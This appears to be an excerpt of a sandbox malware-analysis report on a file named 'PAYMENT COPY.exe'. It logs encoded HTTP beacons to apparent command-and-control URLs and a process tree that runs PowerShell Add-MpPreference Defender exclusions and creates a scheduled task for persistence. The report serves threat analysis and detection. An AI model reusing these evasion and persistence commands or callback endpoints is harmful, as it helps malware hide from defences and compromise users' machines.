May 27, 2024 12:23:25.366863012 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:23:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: User-Agent Link: <https://embrace-counselor.com/wp-json/>; rel="https://api.w.org/" Content-Encoding: br Data Raw: 34 63 31 31 0d 0a a5 ff 9f 00 00 fe fc ca b4 be dd 3f 5f 70 31 38 cd ec 4e 80 c8 ab 58 cc 12 6b cc 6e f5 41 b9 2f b9 bb dd a2 24 46 06 12 f9 32 0b 4d 24 00 01 c8 aa 2c d6 54 84 8a ad 0d df 6b 8d 65 8f 47 b6 37 64 af 67 25 1f 23 8f 63 b4 b3 3b 13 d6 ee 7e fd 6f 8e ae 2f 5f ef ff ab da cb 91 53 a4 4d 53 b9 ce 4c 5a 02 0f a4 9c 71 ca a4 f1 58 4d 8a 94 29 9a fd 9c e2 be f7 ee 4c f0 61 81 0f 0b 00 64 41 4a 2a 00 92 05 28 6a 3f e7 3e de 7b ee 7d 10 f0 f0 a8 21 3e ca 10 24 a8 11 41 3a 26 40 da 23 51 b6 8a 50 94 0a c9 93 42 96 53 d8 5d 1c a7 72 95 a2 21 e9 cf 48 1e 8f 27 e3 49 e1 4c 66 52 a4 4e 9b 5e fe 34 45 9a d2 4d 9f 3a cb e8 9b ff 7f 6d dd da e3 d6 fa 5e 1d 20 84 10 42 08 df f1 07 f0 d2 d7 5f 7e 78 f3 c9 e9 a3 5b 68 ee 5b 39 bb f2 d2 dc b7 12 49 a6 9a a3 d1 73 36 42 15 f3 0c 4b cd 2a a8 8e 46 35 93 0e ae 1f da 71 ab a5 7c fb be 9a 16 54 77 34 e2 52 3b a8 46 b3 2b 2f cd 81 55 b3 2b 2f b5 e0 19 e2 73 66 1d f8 a3 51 e7 6b 3c 19 3d fe 79 15 6b e1 68 54 6b db 32 8f 2b f0 c0 bd d0 6a 84 b8 56 1e 94 3f 1a 79 [TRUNCATED] Data Ascii: 4c11?_p18NXknA/$F2M$,TkeG7dg%#c;~o/_SMSLZqXM)LadAJ(j?>{}!>$A:&@#QPBS]r!H'ILfRN^4EM:m^ B_~x[h[9Is6BKF5q\|Tw4R;F+/U+/sfQk<=ykhTk2+jV?y`Z!s:85RB:p!`iUyXX/ju]UZ)]k)]yIu,rXU4P]S]6ryG&+_RXpt3#{{QX`ppc#&=X<_81csV^Vo,{S4p7lgGx$dx'\-(u[Bo~%$&xv% f)Ms4;l9\7l?? xi.X8,p8n9w?\|o/!~?Wgdx{{/_?oo_?
May 27, 2024 12:23:25.366882086 CEST	224	IN	Data Raw: b0 fd c3 b0 fd fd 97 97 ff fa d9 7f 79 f7 8b 5f fe fb 97 7f fc ce 70 f9 c7 e1 f2 c3 e1 c5 27 c3 e5 5f 86 17 bf 1f 5e 7c 3a 6c 7f 37 6c 7f 3e 6c 3f 1c de de 0e 2f de 1f 5e bc 37 bc f8 74 b8 fc df c3 8b 17 c3 e5 ff 1b 5e 7c fa f9 fb 97 ff f9 97 df Data Ascii: y_p'_^\|:l7l>l?/^7t^\|???autlr~8l_w_{;}:l?~?Oo~aaag8l//\|
May 27, 2024 12:23:25.366936922 CEST	1236	IN	Data Raw: f9 f1 3f e6 47 f7 fb 18 cc ff f0 b3 3f ff 7d f6 7c df 3e 1a 2e 2f bf f8 e9 07 c3 f6 47 c3 e5 3b c3 f6 fd 61 fb e3 e1 ed ed 7f fe 9f 9f 0d 97 df 1d 2e bf ff c5 3f ff fd 57 bf f9 e9 b0 fd 08 e3 07 bf ff f9 fb 97 5f fd c3 7b c3 e5 4f 3e fb ef 3f 0f Data Ascii: ?G?}\|>./G;a.?W_{O>?6!K<\1s.29O)gaO4>nr9In9+^y_:^,t.huDK?ApviwFjV>M?{G_\|/g;.ixyn
May 27, 2024 12:23:25.366991043 CEST	1236	IN	Data Raw: 1e 43 8b 64 fd 7b 72 e6 a1 d1 76 75 4f 38 ff bf fd 39 f6 ac f9 18 d1 af e0 ba 02 52 09 ab 89 ea cf 5d b5 90 f0 08 52 6e 65 ad 95 c7 ae d5 ba 65 f6 8b 99 33 e5 05 93 82 39 a8 a6 b8 d5 17 58 bb de df 03 1a cb 56 8e 33 09 53 c7 6f b9 66 ad 90 ab 5c Data Ascii: Cd{rvuO89R]Rnee39XV3Sof\pj.ZgX+m[&`V0KO)TX"YE0E#(Ha`9/s)6sj/vnx,?0~nLwQJGt7BbsE%ls(/2$*!'r2
May 27, 2024 12:23:25.367003918 CEST	1236	IN	Data Raw: 1b df 58 dd 99 d0 81 04 ee 43 0f bd 67 16 58 de f6 9e 43 55 1c a2 3f f1 bc 85 70 a2 94 18 60 94 d8 23 2b aa 51 c0 11 d8 a4 7d e4 77 e2 2c bc f2 bc 05 07 fe f5 02 d7 95 ad f0 67 21 38 b7 e0 63 44 7f df 94 77 d6 69 9b 1b 2d 94 07 6b 21 a4 6e 52 60 Data Ascii: XCgXCU?p`#+Q}w,g!8cDwi-k!nR`6oX-cLC +~]$O8Hh@UjT0pY\|!F6}lf]~"luN}P9-EtEUs9EFsdfv8Tgk1yYpPly_
May 27, 2024 12:23:25.367031097 CEST	1236	IN	Data Raw: 66 0f e8 72 3a fe 47 47 44 70 ad b0 03 66 f9 dc 94 94 c5 83 18 27 24 ae 81 fa 5c d7 4f 54 e9 63 cd 2d aa c6 12 05 94 87 5f d1 e0 3a 87 13 98 8b ae 4d e9 ee 26 04 e6 9e 57 3d 62 d3 2e c4 6b 87 1e 47 64 14 d6 db 86 cf cd dc 32 07 ad d4 2e d1 f8 18 Data Ascii: fr:GGDpf'$\OTc-_:M&W=b.kGd2.R7z]=Mo{*PV4<A>-oEz_4`&[,+jnq@)DDr5sq;VY7$gAJl\|39^-WX4/u5-gZBpH2n+!<
May 27, 2024 12:23:25.367050886 CEST	896	IN	Data Raw: c4 d4 c8 28 68 8d 4a 02 fd cc ba a5 bc 78 00 c6 93 90 06 ba 9f f0 25 06 c8 b1 b8 ae 59 88 71 3d f2 c1 50 b1 e2 4d 41 3b cb 62 a3 84 59 f6 0e ec 78 b7 84 62 e0 9b 81 07 99 f6 89 15 5b 85 35 9c a5 b5 0d 7a 34 84 fa 36 91 c5 ca 39 d2 3d bf fe 15 37 Data Ascii: (hJx%Yq=PMA;bYxb[5z469=7%W#j}Q"$+Ari?q0GSQqfI"vX@fu>+S#~cX^k+p({;+V%V\|t(j6pLeFH4lE5&:6
May 27, 2024 12:23:25.367084026 CEST	1236	IN	Data Raw: 9c 2d 96 79 74 65 44 52 06 b5 82 9f a8 98 9f 02 d1 b6 41 b8 c2 f7 4d c2 e5 7a 38 b2 b3 04 09 72 02 01 a3 41 0c 2c 1d c3 b8 86 0c 7d d9 a6 f5 98 51 b7 d8 e8 ed 87 48 51 ac 14 1e 91 da 51 13 46 82 ba 07 53 29 d5 05 dc e1 da ea b1 22 25 f1 62 b9 21 Data Ascii: -yteDRAMz8rA,}QHQQFS)"%b!RUxb}$E`TX)],7cYIv%??yf8M>Swfd5s=lr6r3f6y-C;rIdCu'HR$@qX-u
May 27, 2024 12:23:25.367096901 CEST	1236	IN	Data Raw: 0a 6a fb 96 93 e9 72 41 93 b9 a5 b6 b3 db 1b f9 d5 a9 43 a1 45 83 0c 90 05 05 27 9a 5f 0b 40 c0 fc 2f 1b ad ee c6 e3 c8 f4 21 99 f7 b1 55 11 d7 3d 89 12 44 19 1d 9e 8a 0d ba 79 ed 55 13 fb d1 e2 90 f6 08 61 85 9a 87 22 0c b8 a1 09 82 0b 11 ab 13 Data Ascii: jrACE'_@/!U=DyUa"4kcEl-e:+>DB57KJgI-E:JQU)R$ziFz#)d]AaQpHDJy$$9-ka
May 27, 2024 12:23:25.367115021 CEST	1236	IN	Data Raw: f2 14 cc 08 ad 22 55 0f 89 52 b6 8a d9 88 64 da 9c e4 e2 7e 28 36 cc a6 f1 28 47 37 13 1c 21 05 c1 14 e3 17 f1 52 17 3f e4 d0 38 d8 35 83 39 c7 d5 79 cc 40 c9 48 57 e3 9e 1c 8b 60 cc 8d 4e 2a 38 90 80 8b 73 57 24 13 a6 48 6d ef 03 89 2d fd 75 10 Data Ascii: "URd~(6(G7!R?859y@HW`N*8sW$Hm-uS`t5WhI>`u(4"jl3cD^qF$CBYqHe@MBEOR+Oy.K@i_O5Dl^Bi`d&(a26CcTxB&(_
May 27, 2024 12:23:25.372033119 CEST	1236	IN	Data Raw: 2c ae e9 34 8d 30 0c 70 09 0e 1d 95 34 47 5f 57 ed d4 75 ed 70 72 43 78 6d 96 9b e2 b5 02 fc 63 c6 25 30 9b 97 da cf bb 3b ec 19 70 e3 1b 02 e1 8e 21 e9 30 af a1 a9 78 9f 84 d2 0a 42 d2 61 a5 d5 6e 30 0a b9 76 67 89 35 ca 8e e1 09 cc 39 37 84 99 Data Ascii: ,40p4G_WuprCxmc%0;p!0xBan0vg597RwqN7IVgkWp-\|+l?guwt8~f6ck1~.(%lty2b{@Q8FG##leK\jY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.12	49771	202.233.67.46	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:27.001641035 CEST	433	OUT	GET /5xhc/?VlEHDVvh=MlmeOAVABHl7V7JWE669wIJbTLHKaUkhN9NjdS3PgsP7eMcTlCivolpOMqUU2YL5bEhebrvuWwjxxfDDk/ZIeLQ1wF+hSOQ+omIdi18JN7A0f8vC6TD737s=&BHPD=o2nt HTTP/1.1 Host: www.embrace-counselor.com Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:23:27.879295111 CEST	487	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 27 May 2024 10:23:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: User-Agent X-Redirect-By: WordPress Location: http://embrace-counselor.com/5xhc/?VlEHDVvh=MlmeOAVABHl7V7JWE669wIJbTLHKaUkhN9NjdS3PgsP7eMcTlCivolpOMqUU2YL5bEhebrvuWwjxxfDDk/ZIeLQ1wF+hSOQ+omIdi18JN7A0f8vC6TD737s=&BHPD=o2nt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.12	49772	172.67.137.210	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:33.043162107 CEST	694	OUT	POST /9bwj/ HTTP/1.1 Host: www.drednents.es Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.drednents.es Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.drednents.es/9bwj/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 7a 35 2f 70 70 76 39 55 49 44 76 72 48 4d 2b 36 42 41 63 46 63 6b 6d 46 4e 7a 6e 5a 6b 73 4e 34 77 6b 2f 4d 74 4b 77 35 59 6a 6d 2f 4d 67 58 7a 57 36 6b 68 33 6e 73 71 55 53 37 71 67 48 42 6f 62 55 65 39 45 32 69 5a 4a 4b 6f 31 38 56 6c 4e 31 4b 59 34 37 47 4d 50 6f 57 6f 66 2b 44 6e 45 68 55 70 66 47 36 61 56 67 42 51 55 67 62 65 51 41 77 45 61 6c 79 2f 32 4f 58 6b 6f 62 37 71 39 57 6a 67 64 59 70 5a 78 78 53 41 71 69 2b 68 62 34 2f 66 34 65 77 73 64 4a 65 52 33 36 4a 52 66 55 59 32 73 67 6e 30 74 59 75 50 51 78 46 43 56 52 6d 5a 4f 46 45 78 71 57 4d 58 50 68 4f 49 4a 33 77 3d 3d Data Ascii: VlEHDVvh=z5/ppv9UIDvrHM+6BAcFckmFNznZksN4wk/MtKw5Yjm/MgXzW6kh3nsqUS7qgHBobUe9E2iZJKo18VlN1KY47GMPoWof+DnEhUpfG6aVgBQUgbeQAwEaly/2OXkob7q9WjgdYpZxxSAqi+hb4/f4ewsdJeR36JRfUY2sgn0tYuPQxFCVRmZOFExqWMXPhOIJ3w==
May 27, 2024 12:23:33.907399893 CEST	867	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:23:33 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 9 Connection: close Access-Control-Allow-Origin: http://www.drednents.es Vary: Origin, Accept-Encoding Access-Control-Allow-Credentials: true X-XSS-Protection: 1; mode=block X-Frame-Options: DENY X-Download-Options: noopen X-Content-Type-Options: nosniff ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JHelHxjpgicv8xl%2B2Fi2igkr0QVWW1nsKk6VfGvWF%2FToU74I%2B9q%2Bzv8Z42oW5ocga0kscFqb1VzFjSI%2FNofb3Q9BzUALQbuDIgPOngGraGGAgL8dXg8RmBndBWe2dfO5pvW0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a54a498d8d41db-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.12	49773	172.67.137.210	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:35.579829931 CEST	714	OUT	POST /9bwj/ HTTP/1.1 Host: www.drednents.es Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.drednents.es Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.drednents.es/9bwj/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 7a 35 2f 70 70 76 39 55 49 44 76 72 45 6f 43 36 4e 44 30 46 4e 30 6d 47 49 7a 6e 5a 39 38 4e 30 77 6b 7a 4d 74 4a 38 70 59 32 4f 2f 4c 46 7a 7a 56 37 6b 68 30 6e 73 71 62 79 37 76 74 6e 42 68 62 55 43 50 45 30 32 5a 4a 4b 73 31 38 51 68 4e 31 35 41 6e 36 57 4d 4e 6b 32 6f 52 77 6a 6e 45 68 55 70 66 47 36 50 4f 67 46 38 55 67 72 75 51 48 69 38 5a 76 53 2f 31 4a 58 6b 6f 66 37 71 78 57 6a 67 30 59 6f 56 62 78 58 45 71 69 38 35 62 35 75 66 2f 51 77 73 45 47 2b 51 41 39 6f 30 56 65 71 48 6d 72 33 45 75 61 64 7a 48 30 44 54 50 4f 55 52 59 51 48 6c 6e 62 62 75 2f 73 4e 31 41 73 2b 77 38 63 62 2b 69 71 70 43 58 31 68 42 55 47 53 49 55 79 78 41 3d Data Ascii: VlEHDVvh=z5/ppv9UIDvrEoC6ND0FN0mGIznZ98N0wkzMtJ8pY2O/LFzzV7kh0nsqby7vtnBhbUCPE02ZJKs18QhN15An6WMNk2oRwjnEhUpfG6POgF8UgruQHi8ZvS/1JXkof7qxWjg0YoVbxXEqi85b5uf/QwsEG+QA9o0VeqHmr3EuadzH0DTPOURYQHlnbbu/sN1As+w8cb+iqpCX1hBUGSIUyxA=
May 27, 2024 12:23:36.530409098 CEST	863	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:23:36 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 9 Connection: close Access-Control-Allow-Origin: http://www.drednents.es Vary: Origin, Accept-Encoding Access-Control-Allow-Credentials: true X-XSS-Protection: 1; mode=block X-Frame-Options: DENY X-Download-Options: noopen X-Content-Type-Options: nosniff ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fg0G%2BUY373NymVd4bYGVGpwz5W85m9ShPWNXM8YHchBcnG5v1JwGvOko6hVnq6Fft3Pt2x11adbKZoIiyEh%2Fq2kMZU4wEv0Xy7D7jCHba9IWJNDTl%2FDYfT1521AtyC6OS7h2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a54a59fcf7181d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.12	49774	172.67.137.210	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:38.107852936 CEST	1727	OUT	POST /9bwj/ HTTP/1.1 Host: www.drednents.es Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.drednents.es Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.drednents.es/9bwj/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 7a 35 2f 70 70 76 39 55 49 44 76 72 45 6f 43 36 4e 44 30 46 4e 30 6d 47 49 7a 6e 5a 39 38 4e 30 77 6b 7a 4d 74 4a 38 70 59 32 57 2f 4c 33 37 7a 53 6f 4d 68 31 6e 73 71 53 53 37 75 74 6e 41 7a 62 55 62 45 45 30 37 73 4a 49 6b 31 39 79 70 4e 38 6f 41 6e 7a 57 4d 4e 73 57 6f 51 2b 44 6e 56 68 55 5a 62 47 36 66 4f 67 46 38 55 67 74 4b 51 52 67 45 5a 70 53 2f 32 4f 58 6b 30 62 37 71 56 57 6e 45 4f 59 6f 52 68 78 6b 4d 71 69 63 70 62 2b 63 33 2f 63 77 73 47 4b 65 51 59 39 6f 49 57 65 75 75 66 72 33 78 4c 61 61 66 48 34 6e 65 32 57 46 70 77 4b 47 46 2f 49 61 47 61 74 4d 59 44 6b 4e 74 42 63 35 53 35 67 59 79 77 35 57 30 65 57 52 6b 65 6d 30 66 62 56 4d 4c 4e 6d 54 57 7a 36 30 39 77 2b 62 63 38 49 77 62 45 6b 41 64 62 34 4a 56 4b 79 79 48 37 42 6d 65 54 2b 6e 68 6c 30 34 52 53 4c 6a 64 58 59 4a 53 79 6c 51 62 77 46 63 37 57 4d 54 6a 47 74 2f 62 32 2f 6a 36 77 67 45 30 6a 6a 42 66 49 68 76 6e 70 79 59 77 51 64 76 2b 4d 6c 41 47 47 56 66 55 68 63 7a 31 79 73 53 7a 4b 68 57 56 61 64 [TRUNCATED] Data Ascii: VlEHDVvh=z5/ppv9UIDvrEoC6ND0FN0mGIznZ98N0wkzMtJ8pY2W/L37zSoMh1nsqSS7utnAzbUbEE07sJIk19ypN8oAnzWMNsWoQ+DnVhUZbG6fOgF8UgtKQRgEZpS/2OXk0b7qVWnEOYoRhxkMqicpb+c3/cwsGKeQY9oIWeuufr3xLaafH4ne2WFpwKGF/IaGatMYDkNtBc5S5gYyw5W0eWRkem0fbVMLNmTWz609w+bc8IwbEkAdb4JVKyyH7BmeT+nhl04RSLjdXYJSylQbwFc7WMTjGt/b2/j6wgE0jjBfIhvnpyYwQdv+MlAGGVfUhcz1ysSzKhWVadU/oqTwSZz1VZ3sP8UfUt3jzpEYBquWugPDNW5ZZUdPnL0/C4MvBl0VGHi323/b9pkzOQ/QRwCBz02ifrpiWj/V2PpYD14z6KgliQToP3VXUbAASUecVi2qB4uKxgXqIcJMavzbrFkkWKph9M4Il/SAVZpQapKYSpfXxSArdEmBC6RdZPPKEHyzKaMm3EM4TYcre/Coby58MpMxF+7I7rYm/sCjWHdm9pfZB8xd9XInXZBw6vo2gvAGro2kWzCtU01nBkXj7GIc4crGSRodUVkqUix6biSAqmfyKWlG+Zhfgpk8Ij8ayvE4x0tZ4PVyT+ENNMIFG0mm7P2NvaaPwih+co07Xx+a6hjr/+ae3skOU01WzezfOCbO77gu4bWdR32SZ6I/xQXzXwVq8l7yaH2BTkhW1VeYLtMrRD8pSRkXi0MMEtOcuoMu8JamFWJDY4D5q+EMxjee4XOCH3WPGW7k5OGJi0GMbiP2ltFvwUV9t+yqZeqid7MDyLVXnzKatYFbR0/uCGnNH6Ikiau2dWvFrmW513stmLj728GiIfOzj98WCkurhce8elMWG8HGM+QiKtCbR9YB6nIyMTAdm6/ljtCqBg6V6lr07ARKq96hjYVin3IzGaKWVCZqYaUsbIydF7c1iSpL4kWYFPjxrd+71/Uu/7V7zj3l [TRUNCATED]
May 27, 2024 12:23:39.075366974 CEST	871	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:23:39 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 9 Connection: close Access-Control-Allow-Origin: http://www.drednents.es Vary: Origin, Accept-Encoding Access-Control-Allow-Credentials: true X-XSS-Protection: 1; mode=block X-Frame-Options: DENY X-Download-Options: noopen X-Content-Type-Options: nosniff ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhXBWkFoELlqTpd97BSDvjWkW%2FO83QA%2FaCqzRbEO%2FeuKXQlsff%2FPFT7Nkn%2Bj9tqY7srBcTwdyuniL0oB8rpTvOYaIrWNajhWnQx0cwBIk%2FofUkOsmLTOiFtvVzUrEeXqyAtM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a54a69dc214326-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.12	49775	172.67.137.210	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:40.643241882 CEST	424	OUT	GET /9bwj/?VlEHDVvh=+7XJqbUQcguxa/KcUhsZdHSIPDv12M145Gf+kZkuNm6BJEH5M4YG3TEKS2nGgF42YhScJBjRA7U3xzFEvpUC1m9E0lF3kGvEoHdRMqPZgXJQjJurfTYwuhc=&BHPD=o2nt HTTP/1.1 Host: www.drednents.es Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:23:41.640569925 CEST	809	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:23:41 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 9 Connection: close Vary: Origin, Accept-Encoding Access-Control-Allow-Credentials: true X-XSS-Protection: 1; mode=block X-Frame-Options: DENY X-Download-Options: noopen X-Content-Type-Options: nosniff ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L3BK76tXvW1IJNnKCjCxV6mgifOb0z6REFTfKKCpTHtZA2%2FHLxkvlpzMCZI1jVBcCKK0AGn043yvxe6MpDJe9fy2af4N9qkt5iFVApuZATvzUPIXJ%2FboVNG7fn5QjEV9Q%2Buh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a54a79a9291a03-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found

Target ID:	0
Start time:	06:19:38
Start date:	27/05/2024
Path:	C:\Users\user\Desktop\PAYMENT COPY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PAYMENT COPY.exe"
Imagebase:	0x730000
File size:	704'000 bytes
MD5 hash:	A05649B0D742E857FC002AC0B7759512
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:19:39
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe"
Imagebase:	0x600000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:19:39
Start date:	27/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:19:39
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"
Imagebase:	0x600000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:19:39
Start date:	27/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:19:40
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp"
Imagebase:	0x40000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:19:40
Start date:	27/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:19:40
Start date:	27/05/2024
Path:	C:\Users\user\Desktop\PAYMENT COPY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PAYMENT COPY.exe"
Imagebase:	0xa40000
File size:	704'000 bytes
MD5 hash:	A05649B0D742E857FC002AC0B7759512
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
